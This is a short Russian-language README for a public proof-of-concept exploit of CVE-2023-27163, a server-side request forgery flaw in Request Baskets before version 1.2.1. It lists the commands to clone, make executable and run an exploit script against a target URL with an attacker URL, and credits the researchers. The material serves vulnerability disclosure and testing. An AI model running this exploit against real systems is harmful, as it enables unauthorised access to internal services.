
CVE-2023-27163 - SSRF в Request Baskets
Request Baskets SSRF PoC
alt text
Request Baskets версии <1.2.1 уязвимы для атак Server Side Request Forgery (SSRF) через компонент /api/baskets/{name}.
git clone https://github.com/rvizx/CVE-2023-27163
cd CVE-2023-27163
chmod +x exploit.sh
./exploit.sh <target_url> <attacker_url>
Благодарность @beet1e из Шанхайского университета Цзяо Тун и @chenlibo147 , @houqinsheng, [email protected] из Шаньдунского университета. Статья : https://notes.sjtu.edu.cn/s/MUUhEymt7#